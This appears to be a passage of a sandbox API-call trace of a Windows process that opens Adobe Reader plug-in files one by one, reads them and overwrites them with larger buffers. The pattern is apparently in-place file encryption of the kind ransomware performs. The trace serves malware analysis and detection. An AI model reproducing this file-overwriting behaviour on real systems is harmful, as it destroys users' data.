[0090.866] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0090.867] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.867] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa00 [0090.867] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.867] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.867] ReleaseMutex (hMutex=0x168) returned 1 [0090.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.DAN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.DAN", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.DAN", lpUsedDefaultChar=0x0) returned 13 [0090.867] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2fdf2bc*=0xa00, lpOverlapped=0x0) returned 1 [0092.285] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.285] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf88, lpOverlapped=0x0) returned 1 [0092.285] CloseHandle (hObject=0x1e4) returned 1 [0092.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.mpp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.286] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.286] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x44000 [0092.286] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.286] ReleaseMutex (hMutex=0x168) returned 1 [0092.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.mpp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.mpp", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.mpp", lpUsedDefaultChar=0x0) returned 13 [0092.286] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0092.379] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x43000 [0092.379] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0092.486] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x43000 [0092.486] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.487] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0092.487] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.487] CloseHandle (hObject=0x1e4) returned 1 [0092.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.488] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.488] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa00 [0092.488] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.488] ReleaseMutex (hMutex=0x168) returned 1 [0092.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CHT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CHT", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.CHT", lpUsedDefaultChar=0x0) returned 16 [0092.489] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2fdf2bc*=0xa00, lpOverlapped=0x0) returned 1 [0092.504] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.505] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf88, lpOverlapped=0x0) returned 1 [0092.505] CloseHandle (hObject=0x1e4) returned 1 [0092.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.509] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.509] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa00 [0092.509] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.509] ReleaseMutex (hMutex=0x168) returned 1 [0092.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.KOR", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.KOR", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.KOR", lpUsedDefaultChar=0x0) returned 16 [0092.509] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2fdf2bc*=0xa00, lpOverlapped=0x0) returned 1 [0092.518] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.518] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf88, lpOverlapped=0x0) returned 1 [0092.518] CloseHandle (hObject=0x1e4) returned 1 [0092.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Mcimpp.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\mcimpp.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.519] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.519] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0092.519] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.519] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.520] ReleaseMutex (hMutex=0x168) returned 1 [0092.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.CZE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.CZE", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.CZE", lpUsedDefaultChar=0x0) returned 10 [0092.520] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.531] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.531] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.532] CloseHandle (hObject=0x1e4) returned 1 [0092.532] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Mcimpp.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\mcimpp.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.533] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.533] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0092.533] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.533] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.533] ReleaseMutex (hMutex=0x168) returned 1 [0092.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.HUN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.HUN", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.HUN", lpUsedDefaultChar=0x0) returned 10 [0092.533] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.544] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.544] WriteFile (in: hFile=0x1e4, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.545] CloseHandle (hObject=0x1e4) returned 1 [0092.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\MCIMPP.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\mcimpp.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.546] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.546] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0092.546] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.546] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.546] ReleaseMutex (hMutex=0x168) returned 1 [0092.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.RUM", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.RUM", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.RUM", lpUsedDefaultChar=0x0) returned 10 [0092.546] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.588] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.588] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.589] CloseHandle (hObject=0x1e4) returned 1 [0092.589] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Mcimpp.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\mcimpp.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.590] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.590] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0092.590] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.590] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.590] ReleaseMutex (hMutex=0x168) returned 1 [0092.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.SKY", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.SKY", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.SKY", lpUsedDefaultChar=0x0) returned 10 [0092.591] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.598] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.598] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.599] CloseHandle (hObject=0x1e4) returned 1 [0092.599] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\MCIMPP.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\mcimpp.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.600] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.600] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0092.600] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.600] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.600] ReleaseMutex (hMutex=0x168) returned 1 [0092.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.TUR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.TUR", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.TUR", lpUsedDefaultChar=0x0) returned 10 [0092.601] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ce18, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0092.606] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0092.607] WriteFile (in: hFile=0x1e4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0092.607] CloseHandle (hObject=0x1e4) returned 1 [0092.608] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\pddom.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.608] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.609] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x69263 [0092.609] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.609] ReleaseMutex (hMutex=0x168) returned 1 [0092.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.api", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.api", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.api", lpUsedDefaultChar=0x0) returned 9 [0092.609] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0092.619] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x68263 [0092.619] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0092.627] SetFilePointer (in: hFile=0x1e4, 